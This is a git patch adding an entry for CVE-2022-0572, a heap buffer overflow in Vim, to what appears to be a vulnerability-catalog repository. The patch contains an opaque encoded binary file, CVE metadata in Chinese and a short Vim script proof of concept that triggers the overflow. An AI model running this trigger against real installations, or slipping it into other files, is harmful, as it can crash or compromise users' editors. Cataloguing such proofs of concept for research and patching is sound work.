zS4$tLhqL%^9vk~;9T?4#OoxEE1;8t}tCsEUgCG4PV?KMxHe!wUr*^xKu?^;~3W6NP
zhmUu;&wQrEjZVIbkst6@G9+;DZshg&3H{A@e4IMnUQ*G9qWP>DDaYe!LMLc#J_1kP
zH_i_7FaW6yu_M7@>~P(f*XK1+KPnK=?WkNYyI}Qzff;Q!o?Aw5H3D|yT3`kdpDJ@U
z*pR3YIP%l7;WK4MA0G&0cn$vmZ_}t*Z|?S>1=qBwkAYnA-ETC%Ab{xPas!mGMZmew
z*+8K7z5kik@U9|y&-C2|bRBCgVvu4h#}uf4=1BDDr@M1{rx;5;7=tGHjE31|N?9?x
zQtAw!HPa{xkva3gYUW-5cRnuaG?Ji6&-rc>wi%2kx+Fkmz7KAk5i)w*<{6fKPDwTL
zR1$D3V%-x%b|B?Jzon!Y{hQz9ECT#l)-zH13l?09dY{oS;zlRY^5QEq9m=$?LD$Z^
zbZ}52eLp|fo9^g(X^6$HaiKB`T+gv6f8Xq0lK2IN82}s3!h?3kK8X8cyY3$X&6hxJ
zdsQ_C9~xBD8j7b}l*37%xH^X+ua}P>UmF^3+MI<%R)n__=*5Hu+7R#{M6a6-c=Fyu
zAo9B5Z}D(q2OzovfTXJaNtA2p{^hdJ%i40`xSTZE_6vNOO}^38ZdmCqx2pG>yI-9)
zEzdw7Zt<V)(GhUJn_H(OFNL%1O7)?3GH!^dKE-Snm9O|QF7Hg@3}aiIF2Bz&cH~*q
z#%)*&On>u1F)8LcWNhq8reQcYyrX-y9r9S@Rf`&06ub~JA~B_MNj$Q`<K3$KX~0!I
zJ~MM`L+xkz;0u@3=7arSa)UOL4STEc<&1G^!h_ZH$9weM=*;h`QnOKy3`R@4(wm30
zY-u6O6`96@R-C{Eq)iAv3b*wk$M=`-Q;Z7;&;hG184Gn#o@6ZP?jndV=H!H<ku#zs
z19LUngb^&TA*WYuPbiE=JS5wwZR=0Y$8B1swe_E}q>S5A?UL`IK#xJZ+|<3Py9u`R
zd6A%kw#_w<uH{TpJWmYUbZ0e-$B!FJSDlC|B0Li@o_E-oA?juZfbLb4FLYj)LQu+a
z_?}#)aO=Og#6v#5Nk&kcY`8jA(h6U2j!sq=-V0o>uAAP-R<2~6(0COJ<E?+EmYLvT
zruYuo7oY4580T>o7S4-j|Fr7M$Qxa9X*XLoGfwd+&t(#0YV=W#jqJ96;ClOV2W~X!
zqrY-%GPhB^xr6ag=Eu-a54&%JM6ud8mZ?}0YLt;-;>(fZ<KqV4DGr$}jlOPgdw8b$
z*_zrwNo)h7q5#^OehifmjeRgPm?1#`IU?Zq>ysJ!8><;ShG2G}o7IU9MQrO-u;@|6
z)|rgK_uWGSTr_<uo>f4%6LLtMgkr24lBLObTHq}K!%kfEe!$H12;Qc~_t_K;;ZuHe
z%hh6~WJ#A(Pnic)ZHpP=CRm;hLjjeuhUd`D$^tr&X}BX&&XU|hmpiJp;g`!C@w>}>
zM!eh+S=G2v%NfPFDIp{+$}g)10Pi>Kv`#E8F4|)yVygM}e4Z2-m?lYn1?v}6%F8^z
z1?yuxp5Nn~yAcdeL@wQ^ZN{}YDZ0M+I5B&i_u>yL6PFA;*tWGPy|Rl&5U4QiXRV6~
zB##^RhuN7OAlc#^X9wb}<pw{)k#zn;aWQ~GDYv<*lo0mh7@4kKH2f33(emmI#^rL_
zU+;RK@xje20sF501RJLq^?m45l@-2~1E~#9s&|2l=Txa;(ord0OeC)mf_daBN(~KL
zcbis~e%apNh7-KX!6Vu(&>Fr<9+=igh6H-hN9l2So@^=u9Da6uvL<-K`Pt%#^GcVz
zHX2l~3Q}pFvW`i&R46OP3Z~9_>+A1-4MIVCwE$GXMHVg)(fgw91~hCI6($(?YGx+4
zwek-@77T?=0bHt4CUCLT=Pg1;B;9K=Sr4oag4g&6=xDkdlSIw?T->gu>8F%5p}4m2
zc&_LCp$(VHOUkN_(yf}eMbw(N<Xv0Ere$q4qeV6Bo;SQ0K5*A(F`k)poHeln_GnCM
zPvwjv65%IDYP9YzbE@Y(qeI-g1?R~&4+ssY)#|Q)3ck9<+|(J)f&*UlPZVOanB{UE
zw&f8+rAg`p({;>op0L)9`9m=;JxnK8-sF@B=i;DoHd{8Ys?FAJbb9Ll(B9TRi@){S
zw^TsOMAuFXnby*L?}!kBBux8s2w!&UHfz{P_gR+Lkeui5c936eg}1H1HyLs?%7bja
zUBZ}XvRALXcc$AAYt3fG3G`Yc#Vgu%Vy9zi1<6awM3rxPuq}yLm#bdM)JrW$S?dlC
zQuc|MprCz!qCBKa3-JNG9jpuFJ66bhcr_i4dnlz`Km=4Xy7HBHN6=dTk2v{xzfu`d
z@?2&+NJ2nOV*MXWPUH5^QGwvD|8%EtYdfJv_uZ3f;4i;}N3BwFfaU0u3<E?a1}Sk@
zJ6~&G6hKcn1ric6lT$Sfc(YjDWO&ehh4!R8W!ZE%-G{*<l-726<yS6O?R$mpDOBL^
zvnis1)IOx_Q7e79O8XC{L~=y~`Ew4y^YVtHS)@Q5*s$BP9|imxan6DJPHflRWQq|9
zd#BcNc{fgktoqqe37@xU^3wyx6HvM$R+5DzTHd%_xTtaq)6>UQS}uEhz1jW2X(<BL
zt$zRvB6_yUWg8A07ivt=RlnNa&((MQowxj=Ugtvih(IbilK^}<rQ-V(dE@X4b;@)N
zJRt;UkfM^3{8mM0el}Y<A$*Z&=WLBB9G=Tho=TQ!BYz4iik|A_2YyU{Zr9eBbZ8Wd
zD09>elN0hA`jFEV{G;w#T-6!z0w*9jttp2;sJT!31rh)2R#Qci9i0&tKY6wrd?ONQ
z62^lkK&0lR^g4XJTt7$Pn(ICjv_8&d=Tq$GULH!3bKncg$|9MUhIG=|1gTUSup7b`
zb+5~CQ8!)e#eHcyO3HyVK4sJ4^X%&F9xx>|G!oEY1*8|M-{rYf-7~Q#Vn5e~-`kyj
zgMGhY{$fO0<Z<jrfl#pUz>SQ@oRPVxiEPNrqlZ^d&QF3=4JRD;>tP9?h@W>Myyxl`
zgVXBd3v<+otXH(xk4^4KJe|{_jY(^00c%H1o|Jd~@&ilp;%qnXNlAK$LTzS4+>Ug0
zbx(;-8$$pI{2R&N{{g8!t8Q#?3a3h=k%JgdPUP2+mx9ANczvSy!KW~=9y6X`XyR=*
z4_CYyA`wEEVp)}ig+NuIHkw#Wp`7i7X6K^&XLsAZN`C^2`SJ8za$;iUWZ@p&Fx<7G
z{pjZ^;lvn@?KaJ~U<C`*A?XhEe>w9%8)cerhU<{gm*F{$^;0WHkD~cspG>Kj5q)SN
zMZg`1dF;ljdF$zUM%@O1N2qD^3~2aka6nxxxuXB-Y8e=yXz-Tqo2pS)zTR2ZvhM8c
zM8*MpNl9_r*xXvRq~(s7m}qq}>q)m>>w>;N!!KLgOxRv88~)x~q2JrGe*Nrk{7qbY
zL06N$Dg(`!)T|M!n#R4uM<<OjQH<<%I>jBg+SY9A%zlncs;k?tAI^=%S)Ge*r&oP%
zAb75idoeucQ?K1FI5h0!i1iwU2P2fS`874y6FXVdY%h{(oc4B&=uD^5b*pAKIGzoE
zuRvY5>BTD|E-tt$c{bL6f?dCELfH$+UF|$c3x=;b^FFeX&v#FEeSN)31671@uwb!V
zk=#ek!|5Y+<oNZ(9Si{eNhqp*qnuDMPUTxxWnY=9uf?74AvCg(apHbhu2P*68b&YC
zFCB0r;QOQnkCNDsP8o8ZB1~txm+SGlAP+-9fmDd|&l+V?Om8M#s3*L6XKjq!IG?d~
zBR3ze$d@PWTZET(ie4sMk_RSi-O!ss63+zaHaU2To(a*NcVAjc;^9SBO08Y?*MyeG
zePa!$GipbIU$Z*Bv%9uu3mdp0+%{g2Z*n|bF2fHF4mMzGa!5}hebJZmZ8+5H=Z8z-
zbf_IYzJ=yYtGMZomn3{hk3*-)3@o;<d3L#JWlC-)Te&F`oIBwP&#ur#t$uzsoO7z2
z^zo2mbj;siSd1I53f!-!>~A+>hAqm^DnNQc{+8oaXJswa2`od#6l=)^N4R3<PK9KB
zA&$A4uvu})?-=}>Zkw3y->ERGkG1CE{;;XA?AWEFqZd3auIu5PB!qv*g5*Uj3LdLx
z9BRT^=`YS%YM7U{FemTo1VtA&GlahfvQ?5y)?dL|VCB<hXXHEo`i4$05nLM!?SLc=
z*al5DF>-|SWMRd3+HLP%jlP{d`UQneWuJ1<kw7hKV@qewdA+2<;Kx6n1g0&a*B*i@
zOW~&pJUloEdq_L)rx0zL@5kD0z6gxI1jF{3p$;&E_l88|xJ<D%lt`HfyaWFg45N-y
zkp2%Wd}<|f(hw;2=Z0;fWTsUERzSxYcGt^JIgJ$vMJdCHd?Lyc*}zUqX<rT|q-PYq
zJxu}H9R}o;mPi=o7j{UqU&A~1UJp>Gl4385SzXyi)4;P>C7u^$?jItUd5rSbz8o#8
zj<nOtnl0<-(1*iD0u9DyB34V(>4xF6K>zm5p31TO|BYrq25<3Sy@2FBXSKMTCj+LI
zvhU*l1%>}C`E6gJSYyopji}#@=Alq~EPOeBf&aLCNFp!7`^`xRO}*bp_@mAA4a&|W
zZZxiXOc!}Oh4@gj+Tr$!bbhj+c4eW?nRJ$;4}RZj_aVr`f}n6Q0|uCZP^}DaP2@}C
z##U`E5dv5Q0x~4_<CK6by8LxVmnv@j!*GzoB?4V+@>a+DJ{h`l<!-8>BSlU9M?gjf
zxr*FKH;@k*UX|n9uc+mJfbiI){}F^o;CZk^C6TNLYN7AeqyHxoUX(A<X}{+CTQEgH
zm;kWs0cfpuP#*c8Sa{rC(-ksQ8mu&5f;my~sZ6;{mwkHQ<s{!E_f4{t8|t-msQ_a;
zjqC<aap^d@kjPLBA!%s~;+W6nOHIJqX}pT8DKno#KEGmYd7_N4)B2b||H3kHgQoTR
z?MFku)@M9S+9THGvn&L8TOA>%5u^C`n|c;~hTLT?L^UZe7gD&M+ylcghGv&Tj_+yA
zDEh(?vFVU_Df|UZRk6m`eJ{1h2*fie{{OBMFcZ#;UoB7+D{ID<>YPt5Jyk{q&B!z!
z6HE6^9vN=wp4zPC%m~xDsCd`W!ST<|$A|K?;;y^>wBFV)k~p-KUqZ${X(#Ytn$*0N
zU}+6UK}~~<^?|gNRZ$FWIMeEag-vUpsmN9#j~BXueNpF=NS}?_(*HIdCVmTHN^~I)
zp81}HD}g_Aa?i>wbJ(9<`^IF^3a5x4>IM<t)1J10RES^|WH*}~ejoE|=|;b2Za_WF
z?%QyM>))X$5@<NC+2hE6e(sY^9e!e?JSaCzXlEk>=SF)3pZwaJDM8<UKX+wAl)c01
z@Le<%%N}*f!zfBISkr=(<v@dwroS>4uv+He36rW6p=XOAL~*FBt@>V*Y)wy}-eN(j
zlA6*qg26Z99~yTEDL*39VW57O1T+C0eIGuwOdVi%<4(cUo--09HeJ~$T041A;>A6@
z_S~X!rfS!MftCF>*Hn+Z)v7*}+zbmPAcHAlxkMHTxX8qTN6{^G@KePf2&bp|o6Q3&
zNE@SwbrqrI_r*BbdS`k+iq{@RwS;?-!zaZ9Osx>YBqOUA@g!15)l=w_>e=gwaUIBn
zktHy2Vye#NgHnD6Vv_-eS+OTa;OYKG!egx4aYQD^1aOiQt6v?Rh#t;ETDG)6?N51T
zO7{QJ#L-oIg9rwO_Vd>)fIs@^KSAZY<erzYwy}(hk#)ON8ua|Y1J}ILiTyt3H@4X@
zbk1}4sYW^^$B#${0|UXe0=_1IA~PEbA^Z!)hSdDb0XT0>$`FhIx-W?BWN5YgkPP_f
zp8US}{{R#l9o3Z8G&lFiPNns?f@z<+=;yC2__HPO=ixlwwnY<4gF>s&hA*I!L4+Vu
zg9Rs`f1t6jynENvgk2rbvz;aDU>b32nWI3{RA@q85Y!u?V$3<OFKvNWtR(;KmtFAZ
zBmG&)iSt2#nZ|%rmKos)5_-P@Tg&6aKE!_fv9z~=JDSPZPaYkU*hBn{f0UGBs;2n6
zBLt;Z%!_BVB-o#PeB%F~`1pbd`_;qcv7l$RYX^m&J}5PR$stsrp}|ln<Ohk7#MKD$
z^oxNAUc;t;zX5N5_-!D<*k5>*m)dgm)IOWMUsf-JvEbKislj}*W$R}>9oX7N>&)%y
z&-UE`z*Fsa|8<^4q|@(*Ukd#6&W_777+?+QXCQ$e@86yPC*aYp%k|i$Kt@Y@{CU*L
z{lz7+Qv(-RoG@WZQ~WU?Ct3tOk~JUWqx+AxK*J|?-&52#bUD76^NhyNjOogKzqWjS
zwTVrWRkS<~6n(_826P#M2wyd6NyR!8h%>hfFAG9QfiOauHUW8HK?(A_KeN1;tZNkA
zAqHCn=l9+~^6-{(Tqa%bzz>wQfx>dPKVGqGx$S;t2j;eI1xL-;yYI=@Q`K|<eV$qQ
za*G?}4^@ueeq-hLPi1)_5RYM=S@~}F(vAq*N}c)r{z%8+MaQ*gEKjA;j9tmSHn+j>
zehxqVgzlimA%#uOKaNtl(*P!J+Pw|m<Mqq8UT@eGFMlqqiSyCM*ykA};r0fg!`p2M
zq|2hCe9(8B4~U*&D}zmhZW@Fgmis{{fONKvB(|MsLD`#4IX2wK$4)&SL+SSV@MvqV
zSOLuxWQs~+%IWIZYJu+r!ShG{YI(xfmeFL7);xrH7g>NYzWy&}Uy*4IgjkLJ5Lybc
z4LjyZd+pw`%N)_hR5IOk=U*)0`yNR~yeA-PB5+cmGAtPsTu|`&HBf+Eu}cr_EBNbo
zJ}YzU&YyR%#^3b!b6br9qqIJm#9_I+!U+Zvz^MkXWaifL93;`uA)TC5sI*+dDymVO
z9M&FQuLe9w1^0ygqY~qR)7T87rVAgTJhu+|E~h}ffaxn8dhV^k&fO(*n*BQL%$rj{
z_c2rJsOZmv={BS@s?xxq>HsnP0qz%F^N-mH@7Lmme8WQpH<Jh<v@u`TWNIxSBvd)F
zRU>nV3m*1QZ9CeAbEr7FQnd;Y{7yrBAlPf=fx<$2Gnmk=<yZe7CMT3AoBgSm+--iJ
zoFK-}^5^6PhVC<8=(@iBxQ`!InrEI-h^aP_CE&00{I8mXPUijB)PyKM<$vEexb@jb
zE>9b^APg7O0ql%f5Wp_*5ziL5n9_%8V}@qF8<1l=Q}5zUmfp==$D$sQvnlL*hZBwL
z)7Rf0X7CRFSAu@|TY^qf7xfyo(n2)Mi)CP4nh>k7l_KgeeEqSX`*~yn<cXa4zY|Ik
z_u7B<4R$^^d-BJx{WnSa7*9dmf&Xc0f-Ju6jG=AhCKHnP;uma@^v`;_paSW7v}?dW
zQTlefk6d;yS_g$o@&0HX?1Lza^}--xdMTE&HT=`4eoRp@GIhX6KT?&N$T&3V3XYEu
zks~)%wRIxiU3I!tzB?{+#k+%Hux>7fD&;^gl}LxHQS<qLt=$_0GyHm>-G`m**+N=y
zrd{)UGputkBUcP?H9muWDV9k7S7IrZWdeFxS#IEWls-z^?Dx(=O7q;JU!8;1&Q#C6
zx}S+IY(iy`P|^l7MojECu<w1$OwavTj@kPX*f;i6a9*gTk{_yN{Ep8oz1%OBo~aSi
z1nOBWCI8o22W1|6@Jj#P-~=0llm7xt->m;nPb9+_{DOW$8j}^+!;TJ&{%vZ)=)X)&
z_>%SEn$-U}77Hmw7u28lW+z3}jgF8&?<b|dh7`MX(u4|=m7gr!D+o#q#Kjvd59FtU
zHUCa|M~CjOMN+_Ygx>=5W}Ibxq->hVbB}}p*|pLBEjxE~^{Q#cTMCzZq<@Z0pqR75
zVBo@1Q+V%786=-F@K*G{jna43ma>4H(Znm#sJ>QI1@KLCV|=J`kc$mmcspLB{qe61
zMo{R}FO*($nGWVb$*<WMJ6UrlFTP5Zf9Fd%fV7nzrxq8~*Jc@09Y6gjI!YKD;H}^T
z{LErbM&9+u(1e9CHTbfjbXLe?8nsaOyQGR9R-A9YAlpAJF^voeF5|SKU$;iE$o0(8
z&hyX&=K_+vcZQS?nxsiswk+nqE2LQKAfK@;BvBgd@J<6m&5tu{)z4~;8fM*Aj;yIh
z<bidJJVEngP3%P1x=3+#>LEQTE25IAdwp$HYDDjgi9{>gQhbvv|E7mf!Dd&|=4}r|
zRFUXk9fWRqzWo9(I|9MquT%ik=W_vdkciBFPCoNeG~gFem~;9|muc&6QB^HRcO{;!
zUtDv!NB&1I=Nisr!@%+Kl-A}nn{_~rX)`$$o5NF#wMMo%j|>qxCZe8138O~DW0aic
z5Sqi%mP4Yn6iP@|PUR4qa!To$=+)a(>3w^8pX++x>-}<nyRYlMKiv2Azkm1t|8ssc
zZMf{sk1hwm&90yX(IjDu`uKw22kK;9smeb*<BL=Llx{(iFd`MC&b25kYig??OC?|J
zx-f@oCsQ@B?U{LD_=zQlR5z+C;TORdhtvm@$+aO#L#btt>j}G6wPt~z^-*-Zo|;m3
z85Gx_8qbo3)RO#AB?n~+&ks&ETgi<#^wbyp#h5U4f}vDqk-mM?N9Wm<$UCwtvw2^*
zRNJjpojy8|QBjCA;~psu)Qtz_Wo4Jr1ex<^7ppPIT;gx^!EF@ohlvvxUMZb07VZ>W
z8Zh`wle$SGUXQd@n~%!qa5Qo!C(Wm|3{7M_4S;gpn8o}47xM-%qnOqh-{9aI#L51u
zC`?6xxcTkp=E4f~&owul97Lp~r5$B^)$aIuyHgM_KqSA&PHYV!%kb%l)Z5TsxmD@u
zf+^P0z91*>JPyty6xNR#MI9`(eeAV8sI^AevX<bR4AYO>v)%%E$46=~Yom}!Jphfc
zA^V>ZZ9J6(rv#H!(w0(}!odm6o0hQ|Jv>Vx&}RtsPPu4`vhDvnO++t9jQsaHhSAdz
zw_MKw1CPV+DC%7x6h>*Drzwt<l$4~{O|e*-<a@TA_B^nEZsG&aDD>P`4C7!c3GNxN
zzq>RK`=`JPx^r%<SIx}A2_Hx^`DCzamEEP#ZTiCwvESe85T}G?AzCu6mc9>ZY8J9O
z3i`)RHkvCj3fH$Z&^GC-rcT@%@{vRth=MC;jf_$f&{@%SIKXT^8oBw}UJ)y+WC^Jk
z_%Oxp$ErGl%^vbfA!@Uyb`>xU`D4XuJ9fbIs{gq6P~+yG%<7(;Ont&KdxJV!sG%cN
ze*&7h@*E2d0$pSMmPV)JSCe~jB+@zdMvyO?bd#<)K@1DqI_#D)<4sV24TXeK+|94(
zsu`(rCw#U5FZo3*?AFOhb>uDuHbl9K*&7+)BhGZt!VJ+d(cWq5x#t+Z-NHfJDyh1C
zdRcvyC_R^qaqS6-Ole#m*mMv)vzLeTj>novGxD}~zBOYiUS#F${S?^b-Dgf&G9|PU
zpuO_~c`q_l%>|}3%Rg9gygh!8O$kET<)wTmaHch4neE{xkn2C&9!{jLiq=Lz@2Pf(
z6L<k+vXhi~X@pWE2vkaPq(-Wiozc~*bmKhs;Q++N(|FOy*s3EnSU9(V&#VeQT}@q$
zmX|jocvSWjbd=mj3P5_M^^d|=NDT2gdpsJgao_Y=G~ynb_mj74PiNC(BFcoT70UV2
ziAZj-!hv9kWl<2X67=IbWr8nz7p|#T+XvxG`QD#}AOw~^74A6&bU@|rGLp9aXk-1q
z7f38A!AN_@@lcqgWKcIP5KG0yf@znU_D7O-VZmjhZqCfds;GBsQEM1%nxX)B#{tg5
z1j5X!b2VGU{NF1!!hI2aSc*5Kxq>uH6;e+*z{p3=70<4lV?x{S@@OUOxV-hePbEU-
z*C+kK4FUXw_j)FQULB#K%0*vVgbC*kr-TQccaq^Bh1d9rRb&V&vi2St8iUj^b<qK1
z8m});=j+>j*CO<vk$&191l-r0I(j=jyjk%TQWo1p`mRDaJa6SZ$t~LwcU7lF<SZ-F
zIz`N$Ga7s3r#Oz;N*(Xm@<=@M=Qz%;Zo}8v;-Qrg30gLbpLNDfjYW-#5jY&AhS<V$
z-3W{#U>wVeTV18zO`Yi_Az;lFUiP%HLUJ@+H_&ehoK>knDU9_Xk6OmK>Fw!er@=*O
z$7Dn{#l4^^!A(Rivl3+dvc0V^M#0BQ<NUfLtJH9zcac6p*;8C)b(evUj{Oe%qtw*_
zfe%HaLV5yiENchTYgGZ+uKxMX{n=mRD!Q)i!0n9MP(En$+`r?!V^{tb-a~B5*?L{1
z(HJ~-WolhftDzW$wswS9mnOXdTYtrUms@8MbLyQzT>f7*>4wF-e$b?A_+~PBF0@4+
z>OSBpU&0hEy}XqHR_HgK4vCVG?vD;3hehWiMj-q8Of8`#2k*f+*2eiVjg+1k>?}A)
z0Ao1CC2HGQ*4+8^%%UjIc6d6|B;Gc~t=)yV$j$8xU>kV!LN|;$K}83jeCVq%Nqbg^
zf$RawidK}UC;NXch7m<9XTo3<jhM!wQ!mrWGz}Sbci_cFt^)kQ&`~7R)Dm?zA=XR_
zY+#tW4;)2?#Y%g~jWo2iDAOAk^6VL|-JUXnx1qztK2tkiVr8p*Aud@rOtjMo`^@??
zFBF4+;e|O{t_`%erNhI3)yeQX_-ABGC&EKZ@3~*oTjB~ZYTX%xH9?1G4voq}+J7=8
zeJ->)hkS-=RRpK|8!JEw`<_afu>!y}7D*L*oh1VD;FMy?NmOLijJFvA1}rDr!~1dp
zSUWP4UgHG`HwD9dUpVQqr?9iuU2h!=o4QN+zlVBLd|jh|uuN?TI&c*KHBSGt(xeb7
z$@oSbhkryI^EpnY;}YWQ>ahQ^Oil299kzU#+J8WZ@aEMoQN%C*)<1{<0GsXLH!;)J
zv|I_$i^r9e>ZMNVpsgew6l|k=f8peDUPXr{)D%~QD6>({o#>lKl`V*$H0~X5$aKls
zI}NI7KkF(*@iMk#BWCxN9<~w=z&LOAXCG2$TLg^IP1eP}Y~t3i<k@W?lf@M~dvNx!
zX@-Gt6SZqSXc65ybdeGGN>nd?)zHQ^QQ@_f8JcVKaJZ+L>MMmP!OGH`-o$(Ra6)BI
zjwiC)Tx55bY;t%E_PaQ5FmS~F?$sNa*aAr4e8sc+<1QV&*UxeK{9kL&4;JrtpUR<h
zy}5h8&6an;A^x!B{>qOsH<DTj;yvNvMNMR!-*Jzf0T+)7hNMA#EseQ5!SX_;5devm
zikcq*5#&qY!CL0wrc1sc*>dk=#wq@%G_NBcJmcUEuE~sHlw!?e9^9n|KiTA`MJpZS
zk8wI9-(6QLf8We%H=9sV0d3Ui(635n`0U%Mo~?*_B4wdlEISM>FGLM6izZz<FWBv!
zT(owK<!QIQgxHqn4gG%ET3hbx6-*_9ck@>enNDdEM5L#om_GNaGpKGd(J%ntg}P?L
zyt1CJb?ynb*>xCS64pi4+VS;FqgAJG4g-{%w#?-2Upj=1E*K6&jN6jrh^x_AwSMWJ
PjJYfDSb}L8#x?RE`C$Cp

literal 0
HcmV?d00001

diff --git a/cve/vim/2022/CVE-2022-0572/poc b/cve/vim/2022/CVE-2022-0572/poc
new file mode 100644
index 00000000..34b2c14d
--- /dev/null
+++ b/cve/vim/2022/CVE-2022-0572/poc
@@ -0,0 +1,12 @@
+fu R(b,n)
+let old_tabstop=&tabstop
+exe"ret"a:n
+if a:n
+exe'se tabstop='.old_tabstop
+el
+cal l("",R('',4)
+cal l("",R('','')
+endf
+cal setline(1,"\t0\t")
+se tabstop=50
+cal_("",R('',0)
diff --git a/cve/vim/2022/yaml/CVE-2022-0572.yaml b/cve/vim/2022/yaml/CVE-2022-0572.yaml
new file mode 100644
index 00000000..3c4f1c9e
--- /dev/null
+++ b/cve/vim/2022/yaml/CVE-2022-0572.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-0572
+source: https://huntr.dev/bounties/bf3e0643-03e9-4436-a1c8-74e7111c32bf/
+info:
+  name: Vim是一款基于UNIX平台的编辑器。
+  severity: high
+  description: |
+    vim 存在安全漏洞，该漏洞源于在8.2之前的GitHub库vim中基于堆的缓冲区溢出。
+  scope-of-influence:
+    vim < 8.2
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0572
+    - https://github.com/vim/vim/commit/6e28703a8e41f775f64e442c5d11ce1ff599aa3f
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2022-0572
+    cwe-id: CWE-787,CWE-122
+    cnvd-id: None
+    kve-id: None
+  tags: 缓冲区错误,cve2022
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index 67c8c5a6..ccae2467 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -24,6 +24,7 @@ cve:
   vim:
     - CVE-2022-0359
     - CVE-2022-0417
+    - CVE-2022-0572
     - CVE-2022-0629
     - CVE-2022-0729
 cnvd:
-- 
Gitee